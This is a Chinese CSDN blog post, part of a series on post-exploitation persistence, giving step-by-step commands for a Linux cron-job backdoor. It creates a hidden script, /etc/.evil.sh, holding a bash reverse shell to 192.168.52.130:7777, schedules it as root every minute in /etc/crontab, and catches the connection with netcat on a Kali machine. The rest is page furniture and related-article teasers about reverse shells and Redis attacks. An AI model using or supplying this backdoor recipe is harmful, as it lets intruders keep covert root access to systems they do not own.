操作系统权限维持(六)之Linux系统-定时任务后门

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量600 收藏 1
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux 服务器 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129788091
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门

定时任务后门

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹

crontab -u root -r //删除
crontab -u root -l //查看
crontab -u root -e //修改

crontab -u root -l //查看计划任务

在这里插入图片描述

  1. 创建反弹shell脚本,vim /etc/.evil.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.52.130/7777 0>&1

在这里插入图片描述

并加上可执行权限

chmod +x /etc/.evil.sh
  1. 添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

*/1 * * * * root /etc/.evil.sh #每一分钟执行一次

在这里插入图片描述

kali机器开启监听

nc -lvvp 7777

在这里插入图片描述

kali机器收到反弹shell

在这里插入图片描述

千负
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
攻击Redis
mole_exp的博客
05-10 1221
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1216
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
Shell编程_定时反弹shell
soldi_er的博客
04-20 756
文章目录Shell编程hello反弹shellcrontab命令cron介绍使用crontab本地测试 Shell编程 hello   #!符号的作用是告诉操作系统,解释该脚本文件需要的的解释器和相应参数,比如-v是打印程序的源代码。 脚本内容: #!/bin/bash echo "hello, shell" 赋予执行权限:chmod +x test.sh 执行命令: ./test.sh、 或bash test.sh、 或source test.sh 反弹shell   反弹she
ubuntu计划任务反弹shell
秋水的博客
10-01 2292
实验环境 ubuntu 14.04 x64位:192.168.1.115 kali/win10:192.168.1.108/107 所用工具:netcat(瑞士军刀) 计划任务 至于计划任务是什么我觉大不需要太多解释,就是定时执行任务的意思那么接下来看看计划任务的格式,以及书写 crond 是linux用来定期执行程序的命令,如果未安装需要先安装,不在多说 cron服务提供cr...
linux 定时任务 crontab 反弹 shell
weixin_30699463的博客
06-26 1590
日期:2018-11-26 13:47:34 介绍:如何使用定时任务反弹 shell? 0x01、 基本命令 参数 -e:编辑该用户的计时器设置; -l:列出该用户的计时器设置; -r:删除该用户的计时器设置; -u <用户名称>:指定要设定计时器的用户名称。 MAC 直接使用 crontab -e 无效: 编辑 username 的 cr...
linux定时计划反弹shell
niqiu320的博客
05-26 2075
crontab crontab命令常见于Unix和Linux操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
反弹shell汇总(超详细)
qq_52173020的博客
05-27 5348
反弹shell姿势大全
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5535
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 829
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1083
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Linux系统木马后门查杀方法详解
01-09
以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:  一、Web Server(以Nginx为例)  1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)  2、上传...
PowerShell小技巧之定时记录操作系统行为
01-20
或者在另外一个场景,当黑客拿下一个普通权限shell之后,想看看最近有哪些用户登陆过,操作过什么,以便根据用户习惯采取进一步行动获取更高权限,这个时候记录用户行为就显得很重要了。  可能有读者觉得此时安装...
linux系统后门方法+日志清除.txt
01-09
Linux系统安全学习
如何保护你的Linux操作系统
01-09
在现在这个世道中,Linux操作系统安全是十分重要的。但是,你得知道怎么干。一个简单反恶意程序软件是远远不够的,你需要采取其它措施来协同工作。那么试试下面这些手段吧。  使用SELinux  SELinux是用来对...
基于Motorola 68VZ328硬件平台的Linux嵌入式操作系统
10-23
首先,其内核的源码开放,而且许多技术问题可以在嵌入式LINUX的网站上得到解答,支持能够...最后,通过对LINUX系统的开发,以后很容易开发出属于自己平台的产品,安全性方面有所提高,避免很多操作系统留有后门的问题。
Ubuntu使用crontab使用反弹shell问题处理
SHELLCODE_8BIT的博客
12-15 657
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误。在ubuntu环境下做攻击时,会遇到下列情况,使用crontab写入如下命令反弹,会失败。ubuntu反弹SHELL正确用法是。
利用定时任务提权
m0_65267037的博客
04-22 294
​ 我们在拿到shell之后,如果没有现成的内核提权exp可供使用的话,可以从他们的定时任务入手,看看有没有定时任务调用的脚本文件是我们的shell用户可以修改的,同时又是以 root 用户执行的,然后就可以修改之后静待反弹了。首先,我们需要先看有没有定时任务,然后,我们需要找到当前 shell 对哪些文件拥有 修改 的权限,这个文件还需要被定时任务执行,可以使用以下命令。这里我们利用的就是方式一,通过定时任务的文件,将自己的 公钥放入靶机的 authorized_keys 文件,实现攻击机的免密登录。
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2283
常用反弹shell技术汇总
kali linux权限维持,权限维持篇-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千负

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值